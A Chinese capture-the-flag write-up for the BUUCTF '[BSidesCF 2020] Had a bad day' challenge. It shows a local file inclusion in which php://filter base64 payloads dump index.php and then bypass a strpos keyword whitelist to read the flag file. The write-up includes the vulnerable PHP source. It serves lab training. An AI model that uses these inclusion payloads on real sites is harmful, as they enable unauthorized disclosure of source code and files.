BUUCTF Web [BSidesCF 2020]Had a bad day1
[BSidesCF 2020]Had a bad day1
启动靶机,打开burp,点击WOOFERS抓包
可以看到请求中有个meowers的参数,在后面加个'测试
通过报错信息可以看出,category参数会与.php拼接然后进行文件包含。
尝试直接传flag
通过回显可以看出,限制了白名单,只能是woofers和meowers。但是我们猜不到是怎么过滤的,所以通过filter伪协议得到index.php的源码
构造payload:
?category=php://filter/read=convert.base64-encode/resource=index
把得到的编码内容复制到base64解码工具中
拿到源码
<html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="description" content="Images that spark joy"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"><title>Had a bad day?</title><link rel="stylesheet" href="css/material.min.css"><link rel="stylesheet" href="css/style.css"></head><body><div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100"><header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800"><div class="mdl-layout__header-row"><span class="mdl-layout-title">Had a bad day?</span><div class="mdl-layout-spacer"></div><div></header><div class="page-ribbon"></div><main class="page-main mdl-layout__content"><div class="page-container mdl-grid"><div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div><div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col"><div class="page-crumbs mdl-color-text--grey-500"></div><h3>Cheer up!</h3><p>Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!</p><div class="page-include"><?php$file = $_GET['category'];if(isset($file)){if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){include ($file . '.php');}else{echo "Sorry, we currently only support woofers and meowers.";}}?></div><form action="index.php" method="get" id="choice"><center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button><button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center></form></div></div></main></div><script src="js/material.min.js"></script></body>
</html>
重点关注php部分:
<?php$file = $_GET['category'];if(isset($file)){if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){include ($file . '.php');}else{echo "Sorry, we currently only support woofers and meowers.";}}
?>
代码审计,只要传的category参数中含有woofers或者meowers或index就行
构造payload:
?category=php://filter/read=convert.base64-encode/index/resource=flag
其中的index换成woofers或meowers均可
把得到的编码内容复制到base64在线解密中
拿到flag flag{b111264b-fc14-4697-afbc-00a7a143c670}
BUUCTF Web [BSidesCF 2020]Had a bad day1相关推荐
- BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
- BUUCTF:[BSidesCF 2020]Had a bad day
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php ...
- [BSidesCF 2020]Had a bad day1
题目来源:BUUCTF在线评测 进入靶场有如图页面 点击两个选项,发现不断的刷新猫或狗的图片,无特殊信息 利用PHP伪协议查看源码,构造payload:index.php?category=php:/ ...
- BUUCTF Web [BSidesCF 2019]Kookie1 [BSidesCF 2019]Futurella1
目录 [BSidesCF 2019]Kookie1 [BSidesCF 2019]Futurella1 [BSidesCF 2019]Kookie1 启动靶机 一个登录框,提示我们用admin登录,想 ...
- BUUCTF [BSidesCF 2020] Had a bad day
BUUCTF [BSidesCF 2020] Had a bad day 考点: php伪协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/inde ...
- Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
- BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
- BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此 进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
- BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...
最新文章
- python骨灰教学_python+mongodb+flask的基本使用
- HDU 4445 Crazy Tank --枚举
- [MySQL] 为什么要给表加上主键
- 【Java】什么是CAS、synchronized升级概述、偏向锁/轻量级锁详解 - 笔记
- oracle参数文件、控制文件、数据文件、日志文件的位置及查询方法
- PHP使用Pear发送邮件-Windows环境
- BIN文件和HEX文件区别
- 自制力才是你努力的第一步
- 哀悼日很多网站都变成了灰色,这是怎么做到的?
- angular- Directive
- C#通过类的继承来实现判断任意一个三角形并求出它们的周长及面积(等腰三角形,等边三角形,直角三角形,等腰直角三角形)
- Dialog屏蔽Esc按键
- Linux——linux脚本命令集合
- X Window 程式设计入门--第三章 绘图(Graphic)
- 在verilog中#的用法
- commons-math3-3.6.1-org.apache.commons.math3.analysis.differentiation-包下的接口-中英对照文档及源码赏析
- jinja2简单介绍
- My Eighty-sixth Page - 买股票的最佳时机Ⅲ - By Nicolas
- html表单存储功能,纯前端实现保存表单数据功能
- 北斗对时装置(GPS时间同步系统)应用安全追溯系统